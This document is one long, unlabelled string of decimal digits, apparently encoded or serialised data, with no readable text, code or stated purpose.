599210913000742193370688900447367425012600150626828498701630929741028800801556509839100565427820934800441494260820700624511060354900208620541474901295775335851101479633112508400800303856820901672235190958200020795192897100133429374391300388705407109500561629038935100219192614772800996575755108701441843438443201313710834757601273361670021100741475803785500208620541474901307841312816900919562789393901320386054784801670886160273001342247707495400417756301360800846008544716500701820347996000658331248283500870164240896200586660591519400043865844183900746283079989101001292765454401593198590310700817197362482300158074247433700433828697205700421667635288900128123521054900856576665865700336783868272400339421812363801654197036860201277900254242500376288565993501157390855127600452217309026601004678193901100133429374391300406551205357200367733112613301543416866956500745603478652400745603478652400313469061087200156718133184301630929741028800429694926273501535852334093000705631834325100253936483648100743797255706700458141062700301007517338312300307623582225500696904653961200619899597608100329413761605101287194568096000695317332634701234169883868001017472113176501507002791096400155847344766800371101511745500518548900823700534950955524400230920093604401277900254242500376288565993500699794952341501283052504118700766260362584100066404497751300034310695559001357922596835601193614377133201577793956898700545420188818900313469061087200156718133184301630929741028800154792562348800985778754772900703229923606701535562442967601575192070819401579732819697500574557722569300429694926273501390237903788200882008870197401593098003532800563382215223000795927465285000481561071199000059144599827800106683876854500171476651885800185168575013900235895970664700020130453751001369563298498500202686444156200745603478652400745603478652400417756301360800846008544716501641296492307600495836789564300398698935383000185168575013901429243754134401304197010515801667446916570301282515198178101126955923302200687888286223501114179097989501103364192119200816252135669100751161465872000208620541474901307841312816901333662084186400846008544716500253866128558000985778754772900703229923606700742193370688901454047390283001370769150758301031706109617100996581711468301485147377661200185168575013900743657727421901339146772249500482445572502100973741182193600692638602636100449000840380401038074839011700346085721668801342247707495401095406555384700939183300233901522726090876501249246086837601107817749358000548591838036700376288565993500938535429525101603919280939300875330257907300059144599827801339146772249501450838483522800742193370688901454047390283001370769150758301031706109617101068664149314001372889025530100162919830824300155012636405000628191424677501264795724587200011709798744000811464219878401226328538925400447367425012600150626828498701630929741028800822549440088701313710834757601273361670021100741475803785500475585151099801525530039235400268599210913000996575755108701245592057217600400692793633800185168575013900745603478652400745603478652400433353986715100402810988858201293985914173100561629038935101188537228237800296521782033700600262782417001382202692452900790438035205200482445572502100441338037670400402907464144600585087240849800702532846784700108863458084700779911347543401664981697895200084571530291800779362387637500393674451161900304956312188701454861979083301260007643175100171476651885800701820347996001065981713703600804729531596400473507408445900004692668326901274686385207501095406555384700939183300233901328299696186900931421401422600039416841469701527109601799600474806725923900701820347996001065981713703600804729531596400171476651885800185168575013901242451404801601238538640711600170094763690300816764766225100559179909688401071707435033400748633924140100944013654439200563382215223000795927465285001506276116256100620068022811600693051520561800670517143258901231699089415700996575755108700096463428062501434873508355401283052504118700766260362584100066404497751301277900254242500376160931121101421239884468101275199383969001234169883868000683905058395500376160931121101297552222729300996602331502900584317564144601450838483522801263437576565100654076452813000959689187985300546690188220901335199002940100733289838133000111502271074600052862012422200145265770786200384734042151901391971820635000094013220292600748633924140101482933804833901517468217887200116728173930100400692793633800766260362584101293985914173100230497149604701186199849290800185168575013901272197402324300919621273456800174707630197400419855614085700013407182756200672666363679600358087886561601600725959736200633340183615601031706109617101423306635825301654225732240400714761244406101339146772249500743797255706700222832624603401095971534132700486792718935301338577796492600461148579566900943733172354500474806725923900746283079989100154792562348800075207432484700944013654439200940073351696201019201269711701028620015850600330448794772400751161465872000043597654901501544288600886800843817174903300702532846784700108863458084700595629790960601532382496388300474340708504400358087886561601517468217887200073567843069200746283079989101264228528182501016497134226501269419874188500034310695559001372841732005700976872255114901339146772249500729540254353701028620015850601264228528182500475585151099801525530039235400681874101571500648575234734901600629510765700806620523736700082956486951200695317332634701470617170434000501251182573600101755961688001146850974618600566902829097701507208515349100578072956278400582611857111101157390855127600132162786555900681874101571500648575234734901224646884541000952188000998200059144599827801154167290936200690198116638201232381781562801339146772249500658331248283500654076452813001493275444681300978996573543400217673955801900155012636405001418925986709501114179097989501391971820635000094013220292601293985914173101375794005232000342323733073201290090244961000914447367500901665897509595800988169068122200661143931172901042793838875600714616394458201249396505417000517714128042800940073351696201192941133290401107817749358000336783868272400339421812363801654197036860201382953302227501123811427876900619448915418900276140686173500271413627275100266841225734300632547371236501535852334093000008894964483301283538174553401018521663415200620068022811600693051520561800544642778869300743392739806200336783868272400339421812363801654197036860201391971820635000094013220292601501466341285900660784641023300474806725923900746283079989101670886160273000086840925525001532382496388300474340708504400358087886561601517468217887201326367130707001617472228491400978996573543400894913070287100817197362482301523650460838401648708723078201479805039043701506276116256101245592057217600746283079989101293985914173101577793956898701031706109617101293985914173100230497149604701028620015850600330448794772400751161465872000429676877505101543416866956501424928695775000914447367500901603453199579000946637177692601283052504118700849185595800800284386495305000904878357078500801556509839100096463428062500486792718935301338577796492601389383047261501379457918873801339146772249500960015135699800951495558412801416650036565000384601352994100415994674874500460187500342101171607076495101617472228491400707024420090900954805729193801072796226037100909870404808300743365341350800043865844183900746283079989101264228528182500376999780183000313469061087200747993502374100658331248283501269419874188500632547371236500270052172593201508634892660401525530039235401022219611829400833804770242000756225527908500988169068122200236527826680300431026765308900230497149604700212862833940100185168575013900518548900823700534950955524400230920093604400158074247433700433828697205700421667635288900086840925525001656734087197500940073351696200406684497234301479805039043700133429374391301665774887472500663872200586000699794952341500377059764773800743797255706700034310695559000501251182573601164586663421001084413883425500219192614772800684840497722700538347553304100341695687396501270947728316400096463428062500510884968736401031706109617101489403245893001672235190958200020795192897101049148854637300501251182573600552684965085301320386054784801577793956898701256754053298200364000090323700203221664303101423450290818801543323550795300857422749974200215387768345300684840497722700059144599827801454861979083301425162646882600202686444156201071750925032601507151089784100586660591519401545940487527300203541348405200313469061087201231699089415701675058041755501664981697895200939869166037300185168575013901286042306074700491648744972200804613949771300959689187985300900364008030500684840497722700059144599827801454861979083301425162646882600202686444156201389383047261501065981713703600804729531596400794037296817700710578479378300017765929858601264228528182500482445572502100132162786555901655405476999300112599060791600794037296817701108299196936200111470138126000262055450945701577793956898700261767676781500417756301360800846008544716500701820347996001164737370095000266841225734301556707604062801196333064450700266841225734301416650036565000808003191989500003657655808100406684497234301479805039043700701820347996000133429374391300705631834325101186199849290801541479622316101127753231981700455150695374400097406296390400829726199169001579732819697500461148579566900929887621580201072796226037100909870404808300743365341350800529381043033800278324870422800302769047558701545940487527300203541348405201264795724587200686803696181500804729531596400260637035518300202686444156201015119129618700177055035980400433353986715101535852334093001057861004319401326367130707001617472228491400724085955124301425358114472501122068478714800821880569845801349341137642400566902829097700441984451688101155485374752200114508694527301295476968925800024351335252000540194151750600314729751661000702532846784700108863458084701155897797229101258272899005501049316065429301141052318039601593098003532800930782279292300945787653330500081270056242100200608865611101423450290818801543323550795300857422749974201228948800144601618702482102200088495634579500988169068122201661982883311000600262782417001582103224661001586227263589401402509492508700206048060541000364555208829800533381981416901593098003532801520361961151600025681255430601563273892251901264228528182501071750925032601507151089784100586660591519400512349826042900472856000181400035846428646401269419874188500632547371236500402810988858201402509492508700212862833940100185168575013901439743491672700041878394053600909989313546500004692668326900171476651885800185168575013901015138344328600202686444156200498718290803300501251182573600101755961688001146850974618600566902829097700794037296817700710578479378300017765929858600193993410052801591627208364300632547371236501656734087197501391971820635000094013220292601224646884541001295476968925801150146221427600563382215223001071085303109500364555208829800533381981416901072796226037100909870404808300743365341350800684840497722700665883387729801463427784036901671162530756201665774887472500663872200586000742193370688900495836789564300398698935383000185168575013900975323677823501015138344328600202686444156201228948800144601618702482102200088495634579501246387899535501483010135178500350111660339801285589104392100382767998967200674077076700200168713721704401269419874188500632547371236500083849109711901129491676341100013407182756201563273892251900748633924140100545420188818901655405476999300616742068463400795927465285000492404683493001625421516394300015750224544800364555208829801667446916570300209947898195300336783868272400339421812363801654197036860200517714128042800298903238958800926523898213801593198590310700817197362482300336783868272400339421812363801654197036860200668286344455401065180468913000829726199169000846008544716500048974023575401389383047261500960015135699800951495558412801577793956898700944013654439200460187500342101120652525045700794037296817700710578479378300017765929858601293985914173100449982914570000959689187985300900364008030501211261636242900095660429894500972134575196401297552222729301228325316456301154167290936201479633112508401395653541614400855177808492701263437576565100654076452813000011709798744000811464219878400162919830824300170094763690300816764766225101114179097989500894913070287100512819318835501489403245893001091236702240500822549440088700431026765308900931421401422601454047390283001256754053298200658331248283500804729531596401154167290936200051743937593101323521284563901447700982741600579624497503501277900254242500376288565993501328299696186900985778754772900703229923606700034310695559000894913070287101381170776337500486407911714100865621568234100996575755108700329413761605101287194568096000336783868272400339421812363801654197036860201655405476999300112599060791600699794952341500377059764773800743797255706700313469061087200747993502374100658331248283500670517143258901231699089415701241137750625600663872200586001675058041755501064333875338901421817069325901381170776337501494833438066100804613949771300417756301360800944013654439200677682630477201060394153937601252929765556600606947222669001259436289793001441843438443201066472795746400277699294950701545940487527300505738510593500106683876854500940073351696200865621568234100682547751365200853076132436400644704396404701068575186511201667446916570301282515198178101126955923302200687888286223501114179097989500794037296817701446791253778000253936483648100743797255706701655405476999300112599060791601007517338312300307623582225501613652765156100620068022811601304622852781800029421655869001052198714569901367453730491800510884968736401031706109617101264228528182501114179097989500504231573192300373893213737001273819318565900475585151099801525530039235400474806725923901614065563301500924434495966800154792562348800417756301360800944013654439200517714128042801211216140664601263515721120701333858411096701545940487527301028083608835600684840497722700665883387729800837425905726200434115573333600714761244406101018521663415200136728028375600790438035205200654076452813001493275444681301424928695775000559179909688401071707435033400632547371236500170094763690300816764766225101283052504118701157390855127600132162786555900938996956427000124694905223900766260362584101293985914173101416650036565000996602331502900584317564144601470617170434000501251182573601164586663421001084413883425501630547059370001454861979083300857422749974201439743491672700786490475396101102221853090201568613203020401556506228272601439743491672701339146772249501420957019563800101755961688000606947222669000449982914570000996575755108700096463428062501434873508355400434115573333600714761244406101297552222729301554702055590901418925986709501072796226037100909870404808300743365341350800946637177692601391624968895700885398755533701196333064450701389383047261500733289838133000111502271074600052862012422200043865844183900746283079989100632547371236501102221853090201568613203020400336783868272400339421812363801654197036860200043865844183900907468716504600271413627275100266841225734300449048430917000804729531596400260637035518300202686444156201420957019563800101755961688000339421812363801535562442967601575192070819400314729751661000417756301360800944013654439200930782279292300945787653330500073150358634501256754053298200046637866430301295129138449600433828697205700517714128042800894913070287101381170776337500486407911714100517714128042800742193370688900383866983384201339146772249500431026765308901416650036565001370769150758301154167290936200773681487057700817197362482301022219611829400833804770242000756225527908500298903238958801395653541614400855177808492701211216140664601263515721120701333858411096701042793838875600628191424677500990717899372700433828697205701007517338312300307623582225501318747646266701577793956898700314729751661001535562442967600779911347543401091236702240501094112916220201483010135178500350111660339801641296492307601454047390283001256754053298201234169883868001484358600590401337299441625001336156586956201155833182625801600629510765700806620523736700082956486951200171476651885800701820347996000961746029005901128908561720800866862711175700162919830824300634164460257000024351335252000481561071199000902639998027800272422961535400013407182756201015119129618700177055035980401393249234250100206048060541000954805729193801372788283574301540115086130200193993410052800456984144044701394147595379100042872793889000206076673721701418925986709500398038628956300683905058395500376288565993501205319988186301338577796492600208620541474900773396735038901157390855127600452217309026601675938226680600215285362815400660784641023301108227747501400684827900219600644704396404700141378984763000586660591519400940073351696200988169068122201314442831281200206387364822700989509417126300101755961688000049639193179801042793838875600714616394458201249396505417001545940487527300952768828893101224646884541000246507117013400088752246420701489403245893001591627208364301231699089415700279900672325100859914607239001630929741028800429694926273501390237903788200882008870197400975323677823500790952107870001146850974618600566902829097701277900254242500780970296384900524297510900901479805039043700701820347996000491648744972200804613949771300458141062700300298903238958800619899597608100329413761605101287194568096001545940487527300505738510593501154167290936201155485374752200114508694527301295476968925800024351335252001434873508355400329413761605101287194568096000959689187985300900364008030500609307458562101517468217887200371101511745500008894964483301283538174553401541479622316100270052172593201508634892660401525530039235400894913070287100512819318835501370692488514300495836789564300398698935383000185168575013901269419874188501224646884541001336724815397100278324870422800302769047558701007517338312300307623582225500696904653961201672235190958200020795192897100133429374391300208620541474901307841312816900654076452813000987160493271200865621568234100677682630477201060394153937601252929765556600230497149604701186199849290801641296492307601454047390283001370769150758301031706109617100956769709442800433353986715100342323733073201290090244961000914447367500901545940487527300505738510593501339146772249500351288430218701281633624014500376288565993500116728173930100114508694527301295476968925800024351335252000217673955801900771645289427600804729531596400069681500308200029436631286701339146772249501286703237841500766260362584101183643490507800266841225734300284284176120001463427784036900745625506280001176303256611400632547371236500270052172593201508634892660401525530039235400034310695559000501251182573600031357374130501524453310374300574557722569300822549440088701114179097989500501251182573600552684965085301320386054784801270947728316400266841225734300086840925525001390237903788200882008870197400219829849383001016497134226501269419874188500946637177692600133429374391300215387768345300794037296817700779362387637500868496463913800857422749974201072796226037100909870404808300743365341350800946637177692600133429374391301593098003532801520361961151600274675441052001479633112508401670886160273000929583851742300425475498510400707024420090900482445572502100253732912771701454861979083300857422749974200544642778869300743392739806200517714128042800681874101571500961967918846001674937958109500846008544716500639023615433400452822702421801196082423928800940073351696200449000840380400212862833940100185168575013901429243754134401304197010515801494833438066100804613949771300609307458562101517468217887201600725959736200816764766225101129785816901600679363066710301291674042162201493275444681300891859093714700111502271074600857422749974201391624968895700600262782417001382202692452900790438035205200475585151099801525530039235400458141062700300996575755108700329413761605101287194568096000298903238958801041179679887801671162530756200376999780183001139706861912400660784641023301108227747501401313710834757601146850974618600566902829097700563382215223001016826053624500051743937593101323521284563900066211423467001444848117588600539591080060201416650036565001554702055590901418925986709500975323677823501015138344328600202686444156201286703237841500766260362584101264228528182500954805729193801129785816901600679363066710301205319988186301338577796492601417751668764600396392883247800760594335563400259206794618300888623733365901454047390283001370769150758301031706109617101675938226680600582611857111100988169068122201287194723634901391971820635000094013220292601402509492508700084571530291800779362387637501534521837393201591627208364301600629510765701128908561720800866862711175701556634890308301052286979389400176940140280501337789880137901442292991548200513770356886400857422749974200642089479341800975323677823501435548344888901318747646266701191897760568200457101385444001064333875338901485147377661200822062867100200307761204761501058691911274900313549422691801071085303109500196320034425000555376730180300022422885397101166730499692300202686444156201655987830530700017765929858601304622852781801150146221427601545940487527301614065563301500371782683324200185168575013901140090743047200914447367500900277699294950700230497149604700519183516699501387372933280300022422885397100235895970664700914447367500901494833438066101349341137642400097406296390401402509492508701154167290936200524297510900901479805039043700701820347996001313710834757601273361670021100741475803785501349341137642400566902829097701545940487527300203541348405200268599210913001624907990486001062945307052800270616550086600457488509887700779362387637500868496463913800857422749974201066472795746400277699294950700279900672325101529569124908901042793838875600714616394458201249396505417001150146221427600279900672325101273819318565901086971604133000468212675422500501251182573600031357374130501524453310374300124694905223900745603478652400512349826042901196082423928801438274608369001245592057217601141052318039601114179097989500279900672325101268152273743301543323550795301545940487527301028083608835601007517338312300307623582225501006966621049600284284176120001591627208364301231699089415700279900672325100295386756907101017472113176501507002791096400155847344766801241137750625600663872200586000171476651885801523251945517101624907990486000512819318835500425475498510400300019495023001575192070819400816764766225101129785816901600679363066710301394147595379100042872793889000206076673721700627792005287300681874101571500961967918846000956769709442800988169068122201661982883311000687888286223501114179097989500560939390372800714761244406100185168575013901654197036860201339146772249500639770406511701063054718910000644704396404700141378984763000586660591519401324559822660600013662484812101304622852781800011709798744000811464219878401068664149314000513770356886400857422749974201258272899005501049316065429300747613037571000884123162560900398897197621001454861979083300171476651885800185168575013900482445572502100132162786555900171476651885801523251945517100946637177692600133429374391300736828408139901514237980031300986079483983601441747320731600429694926273501645954401158900701820347996001349341137642400566902829097700458141062700300609307458562100102614601586200266841225734301532356652341200124694905223900766260362584101224646884541001191897760568200457101385444000595629790960600044646742789501183643490507801441843438443201286703237841500766260362584101402509492508700212862833940100890246804487900051743937593101323521284563900066211423467001444848117588600539591080060200230497149604700680698652205200734336739102401600725959736200816764766225100743657727421901340577240526200253866128558000734336739102401157390855127600452217309026601184294607311301607679008557501532382496388300474340708504400358087886561601517468217887201372841732005700976872255114901339146772249500388705407109500011551688516900271413627275100266841225734301293985914173101630547059370001454861979083300857422749974201071750925032601507151089784100586660591519400517714128042800034310695559001665897509595800433353986715100634164460257000024351335252000540194151750600816764766225101242451404801601335213733378901076273607848200010589294066801532382496388300474340708504400358087886561601517468217887200865621568234101357922596835601193614377133201577793956898700846008544716500705631834325101028620015850600330448794772400751161465872000743657727421901340577240526200253866128558000517714128042800695317332634701234169883868000773681487057700817197362482300959689187985300900364008030501627472694842200168713721704400482445572502100253732912771701454861979083301260007643175100073567843069200746283079989101224646884541000734336739102400940073351696200686803696181500136728028375601339146772249501543481370167600687888286223501114179097989500116728173930100114508694527301295476968925800024351335252000510884968736400212862833940100185168575013901654197036860200106683876854500034310695559000796560484928800207036747311500857422749974200475585151099801525530039235401667446916570300209947898195300517714128042801438274608369001245592057217601141052318039600804613949771300049682769446801273819318565901450838483522801273819318565900461148579566900943733172354501264795724587200677682630477201060394153937601252929765556600606947222669001259436289793001283052504118700766260362584100066404497751300794037296817701238538640711600342323733073201290090244961000914447367500901665897509595801520361961151601063054718910000794037296817700779362387637500868496463913800857422749974200219829849383000388705407109501317864270035700200608865611100736828408139901514237980031300986079483983600228871841388101362918883544501041179679887800456984144044700429694926273501127753231981700455150695374400097406296390400801556509839101441843438443201441747320731600829726199169001579732819697501286042306074701295129138449600433828697205701324559822660600842378973031000545420188818901183643490507801441843438443200891859093714700111502271074600857422749974201665774887472500663872200586001438274608369001245592057217601141052318039600482445572502101527059084532501231699089415700681874101571500648575234734901183643490507800096463428062501201765902636600856576665865700668286344455401065180468913000303316881346300804729531596400260637035518301291983314150600683905058395500376160931121101114179097989501523650460838401648708723078201479805039043701434873508355400266841225734300086840925525000170094763690300816764766225101441747320731600829726199169001256754053298200046637866430300482445572502101527059084532501231699089415700940073351696200563382215223001071085303109501114179097989500938996956427000042872793889000206076673721701418925986709501295129138449600433828697205700043865844183900746283079989100632547371236500270052172593201508634892660401525530039235401157390855127600452217309026601004678193901100654076452813001493275444681300133429374391300518548900823700534950955524400230920093604401545940487527301381170776337501174899257477600048974023575400544642778869300404840386635000914447367500901603453199579000501251182573600552684965085301320386054784800422813900638800762121975194001600725959736200816764766225100518548900823700534950955524400230920093604401263437576565100654076452813001357922596835600606947222669001662407496425101591627208364300632547371236500155012636405000628191424677500946637177692601283052504118700693605899757400670517143258901283052504118700923517390893500266841225734300203221664303101164737370095001283052504118700766260362584100066404497751301157390855127600132162786555901391971820635000094013220292601224646884541000086840925525000270052172593201508634892660401525530039235401545940487527301381170776337501174899257477601641296492307600383866983384201339146772249500475585151099801525530039235400940073351696201545940487527301381170776337501174899257477601541479622316100170094763690300816764766225101636617111812900663872200586001263437576565100654076452813001277900254242501366002443301000865621568234100501251182573600031357374130501524453310374301283052504118700073567843069200746283079989101489403245893001607679008557500634164460257000024351335252001534521837393200745625506280001176303256611400193993410052801671162530756200266841225734300203221664303101450838483522800073567843069200746283079989101293985914173100633397665738001336156586956201155833182625801501466341285900086840925525000054970590442401655987830530701272197402324301432627616156000431026765308901416650036565001591627208364301600629510765701152803342651400803657545306301382953302227500092660185488400868434975503101582103224661001586227263589400748633924140101437652609630300501251182573600101755961688001146850974618600566902829097701241137750625600663872200586000433353986715100710778023616900238245360019901493311031079100806620523736701335199002940100150038192815300853150258639300185168575013901065981713703600804729531596401600725959736200816764766225101136557393224200455150695374400097406296390401205319988186301372889025530100007336712786700278324870422800302769047558700959689187985300900364008030500417756301360800846008544716500280916374605201672235190958200020795192897100133429374391300639770406511700025681255430601424928695775000743657727421901339146772249501286703237841500766260362584101264228528182501563273892251900848597058240200278324870422800302769047558701434246506527101628028383769101129785816901600679363066710300429694926273500083849109711901129491676341100013407182756200100735779374300474340708504400358087886561601517468217887201582103224661001586227263589401489403245893000556791161388500266841225734300848597058240200278324870422800302769047558700894913070287101381170776337500486407911714100449000840380400212862833940100185168575013901295129138449601447700982741600579624497503501382953302227500092660185488400868434975503100298903238958800271413627275100304956312188701454861979083300857422749974200597183424740200544471192471701177353896955800748633924140100816764766225101283052504118701007517338312300307623582225501229367213751900452822702421801196082423928800066211423467001444848117588600539591080060200234419804955600088752246420701264228528182500376999780183000512349826042900472856000181400035846428646400773574102039500202686444156201421239884468101275199383969000658331248283501058691911274901479633112508401094112916220200806620523736700082956486951200473507408445900004692668326901274686385207501095406555384700939183300233900548591838036700230497149604701028620015850600330448794772400751161465872000544642778869300404840386635000406551205357200367733112613300715495763002400940073351696200122165290114000606947222669001342247707495400560939390372800714761244406100185168575013900388705407109500533100038186800406551205357200367733112613301543416866956500729540254353701028620015850601501466341285900660784641023300417756301360800846008544716501309275114856100808003191989501231699089415700450410135090000094198558471500954805729193800388705407109501317864270035701228325316456300773396735038901264795724587200181781168968601412798843294401435548344888900696904653961201446487938400701071750925032601507151089784100586660591519400563382215223001016826053624501648779327006001245592057217601141052318039600219829849383000563155575653601338698133603400325777750243500582611857111100684840497722700059144599827801454861979083301425162646882600202686444156200150038192815300853150258639300185168575013901228948800144601618702482102200088495634579501157390855127600132162786555900865621568234100298903238958801672235190958200162919830824300710778023616900238245360019900431026765308901113984060037201372889025530101675938226680601123811427876900619448915418901664981697895201031706109617101532356652341200042872793889000206076673721701418925986709501313710834757601273361670021100323726849970201484358600590401041179679887800808003191989500003657655808100609307458562101517468217887200563382215223001570132690936900298903238958801042873485455600278324870422800302769047558701277900254242500376288565993500474806725923901614065563301500924434495966800800303856820901607679008557500634164460257000024351335252000393674451161900124694905223900766260362584101224646884541001191897760568200457101385444001463427784036901554702055590901418925986709500133429374391300431026765308900148851484396200632547371236501390237903788200882008870197401389383047261500458826748941300822062867100200914447367500901157390855127600132162786555900417756301360800846008544716501309275114856100808003191989501231699089415700185168575013900538102727369400185168575013900133429374391300909989313546500004692668326900501251182573601396488578660600512819318835500632547371236500155012636405001418925986709501261446935222900904491175566401418925986709501379457918873801339146772249501228948800144601618702482102200088495634579501539208094321601543323550795301065204937100201273819318565901320386054784800154792562348800996575755108701245592057217600400692793633800185168575013901015119129618700177055035980400122165290114000284284176120001672235190958200020795192897100133429374391301441747320731600829726199169000816764766225100538102727369400185168575013901636617111812900663872200586000474806725923901614065563301500924434495966800429694926273501532382496388300474340708504400358087886561601517468217887200371101511745500812246962301100293239062252401633338604014800384734042151900560939390372800714761244406100185168575013900124694905223900745603478652400684840497722700538347553304100341695687396500606947222669001342247707495401211216140664601263515721120701333858411096701655405476999300112599060791600433353986715100634164460257000024351335252000659269109077600495836789564300398698935383000185168575013900654076452813001493275444681301389383047261501015138344328600202686444156201071750925032601507151089784100586660591519400681874101571500961967918846000162919830824300044646742789501293985914173100606947222669001188537228237800150038192815300853150258639300155784641778901157390855127600452217309026601184294607311301091236702240500415451369979100383866983384200106683876854500474806725923901614065563301500924434495966800154792562348800734336739102400491521545786400855177808492701517468217887200501251182573600031357374130500458286933075201357922596835601270947728316401441843438443200804613949771300049682769446801273819318565901160364863185100819835017886900046637866430300574557722569301400709114937000996602331502900584317564144600733289838133000111502271074600052862012422200298903238958800822549440088701436542516735200437380541045900133429374391300736828408139901514237980031300986079483983600654076452813001493275444681301450838483522801273819318565900219829849383001441747320731600429694926273500878048373029200531277783562601489403245893001012034583169101454047390283001256754053298200658331248283501654197036860200106683876854500298903238958801042873485455600278324870422800302769047558701277900254242500780970296384901017472113176500952768828893101532356652341201340577240526201304622852781800930782279292300945787653330501198829339749600853150258639301018521663415201485147377661200822062867100200307761204761500954805729193800406551205357200367733112613300715495763002401438274608369000985778754772900762121975194001264795724587200298903238958801672235190958200996581711468301031706109617101264228528182500736828408139901514237980031300986079483983600015750224544800435350656915000563382215223001016826053624500683905058395500376160931121100804729531596401339146772249501283052504118701675058041755501672235190958200020795192897100133429374391301424928695775001636617111812900663872200586000865621568234100686803696181500902639998027800272422961535400013407182756201436542516735200437380541045900133429374391301015119129618700177055035980400449000840380400435844834316801507151089784100748633924140101579732819697500544642778869300404840386635000351288430218701281633624014500376288565993500686803696181500136728028375601339146772249501320386054784800800303856820901155897797229100518548900823700534950955524400230920093604400988169068122200272469078380501479633112508401094112916220200806620523736700082956486951200702532846784700413904474248800586660591519401522726090876501249246086837601107817749358000699794952341500377059764773800743797255706701264795724587200181781168968601412798843294401436542516735200437380541045900133429374391300974627408906400857422749974200431026765308900931421401422600039416841469701527109601799600684840497722700059144599827801454861979083301425162646882600202686444156200743657727421901340577240526200065295817213501123811427876900619448915418900665202477163400853150258639300773396735038900940073351696200796560484928800207036747311500857422749974201015119129618700177055035980400677682630477201060394153937601252929765556601577793956898701404388996835001324539036941301120652525045700512349826042900456984144044700133429374391300974627408906400857422749974200745603478652400745603478652401328299696186900234419804955600743657727421901333350725531400606947222669000959784444213100965531702562801313710834757600804729531596401517468217887200562119491009600683905058395500376160931121100133429374391300406551205357200367733112613300715495763002401263437576565100654076452813000145265770786200384734042151901391971820635000094013220292600748633924140101482933804833901517468217887200116728173930100400692793633800766260362584101293985914173100230497149604701186199849290800185168575013901272197402324300919621273456800174707630197400419855614085700013407182756200672666363679600358087886561601600725959736200633340183615601031706109617101423306635825301654225732240400714761244406101339146772249500743797255706700412858598452401196333064450700714616394458200779362387637501517468217887200865621568234100930782279292300763231454373700253866128558001556707604062800136728028375600141355232762200176940140280501337789880137900139969482457301028620015850600330448794772400751161465872000043597654901501544288600886800843817174903301264795724587200181781168968600259376547251700881204803763400412927489443900081893145046201556634890308301095971534132701038994022218800230497149604700212862833940100185168575013901424928695775000228871841388101362918883544501664981697895200253936483648100743797255706700684840497722700538347553304100341695687396501113984060037200620068022811601304622852781801447700982741600579624497503500695317332634700586337823952500794037296817700710578479378300017765929858600449048430917000902639998027800272422961535400013407182756201016497134226501269419874188501324559822660600013662484812101304622852781800268599210913000684840497722700059144599827801454861979083301425162646882600202686444156200714616394458200779362387637501517468217887201535562442967601575192070819400545420188818900794037296817700447024166343700304956312188701454861979083300840078953171801155485374752200114508694527301295476968925800024351335252001434873508355401441843438443201320386054784800829726199169000846008544716501541479622316101535852334093001114179097989500544471192471701177353896955801293985914173101375794005232000415637675202901320386054784801670886160273000582611857111101211216140664601263515721120701333858411096700417756301360800846008544716500065295817213500092660185488400868434975503100695317332634700498746174125400954805729193801654197036860201339146772249500100735779374300474340708504400358087886561601517468217887200996575755108701441843438443200043597654901501544288600886800843817174903300695317332634700498746174125400228871841388101362918883544501607679008557500710778023616900238245360019901228948800144601618702482102200088495634579500959689187985300900364008030500492404683493001625421516394300133429374391300670517143258901231699089415700412858598452401196333064450700431026765308900128123521054900660784641023301108227747501400978996573543400081254177605801064068406862800412927489443900081893145046200996581711468300253936483648100743797255706701277900254242500376288565993500946637177692600133429374391301379457918873801339146772249501258272899005501049316065429301313016623749500959689187985300900364008030501042793838875600628191424677500990717899372700433828697205701655405476999300112599060791601157390855127600452217309026600162919830824301392127161226100432400235583200693605899757400266841225734301399601826920300684538439096401264228528182500769305885604501313773226184000485979780858700609307458562101356307218710700959784444213100946637177692601049148854637301655405476999300616742068463400795927465285000066211423467001444848117588600539591080060200339421812363801169002046808100217673955801901576519165215001493275444681300974627408906400857422749974200208620541474901307841312816901436542516735200437380541045901049148854637300501251182573600552684965085301006744972845000914447367500901341306447354001038994022218800833804770242000690432793517200266841225734300086840925525000771645289427600804729531596400371101511745500773574102039500202686444156201228948800144601618702482102200088495634579501328299696186900985778754772900762121975194000681874101571500648575234734901183643490507801054056649178600504231573192300373893213737001273819318565900914447367500901603453199579000417756301360800846008544716500701820347996000015750224544800435350656915001382953302227500449982914570000609307458562101225317099411400084571530291800779362387637500481561071199000136728028375600106683876854500988169068122201211455727471101654197036860201339146772249500729540254353701028620015850600193993410052801593586799087800517714128042800501251182573600101755961688001146850974618600566902829097701520361961151600025681255430601441747320731601291674042162201273819318565901608984644136600230497149604700212862833940100890246804487900773681487057700817197362482300518473153963500624511060354901065981713703600804729531596401382953302227501630547059370001454861979083300857422749974200008894964483301283538174553401285589104392100513770356886400857422749974200684827900219601545940487527300505738510593501339146772249501436542516735200437380541045900133429374391301066472795746400277699294950700684840497722700538347553304100341695687396501193614377133200898211870581300024131188842701532356652341200289433611227701403811386076201545940487527300203541348405200609307458562100246507117013400743657727421901333350725531400086840925525000170094763690300816764766225100743657727421901339146772249500812246962301100206048060541000008894964483301283538174553401018521663415201196333064450701160364863185100819835017886901506276116256100681459152284401042793838875600714616394458200921958752339401293985914173101342247707495400458141062700300684840497722700059144599827801454861979083301425162646882600202686444156200111470138126000262055450945700339421812363800985778754772900703229923606700313469061087201231699089415701150146221427600794037296817700710578479378300017765929858600632547371236501645954401158900701820347996001295129138449600433828697205700458141062700300959689187985300900364008030500988169068122200526711694146400743657727421901340577240526201641296492307601454047390283001256754053298201234169883868000687888286223501114179097989500279900672325101268152273743301543323550795300492404683493001625421516394301114179097989500695317332634700498746174125401473942096437600335844720910800658331248283500458826748941300822062867100200914447367500900449000840380400435844834316801507151089784101183643490507800096463428062501201765902636600384734042151900794037296817701446791253778000469800665919200898211870581300822062867100201543416866956501417751668764600396392883247800253866128558000075207432484701579732819697500215387768345300684840497722700059144599827801454861979083301425162646882600202686444156200406551205357200367733112613301543416866956501114179097989500609307458562101517468217887200268599210913000073567843069200746283079989101001292765454401593198590310700817197362482300034310695559001357922596835600931421401422600447367425012600150626828498701630929741028800822549440088701313710834757601273361670021100741475803785500773574102039500202686444156200376999780183000996575755108700860637262964300178197645915801052084788716501535050448225100890246804487900884123162560900398897197621001454861979083300794037296817701642624150203901483010135178500350111660339800065295817213500449982914570001382953302227501052084788716500136728028375601339146772249501439743491672700786490475396101645954401158900701820347996001295129138449600433828697205700512349826042900472856000181400035846428646400228871841388101362918883544501607679008557500402810988858201197365000041801095971534132701038994022218801416650036565001370769150758301339146772249501389383047261500266841225734300234419804955600853150258639301285589104392100382767998967200674077076700200296037487640901479633112508401516811944381901076273607848201198005570462501370769150758300106683876854500158074247433700433828697205700421667635288900284284176120001664981697895201186199849290800253866128558000203221664303100482445572502100973741182193600692638602636100501251182573601164586663421001506276116256101613068430488700687888286223501114179097989500609307458562101517468217887201627472694842201320701744408700702532846784700413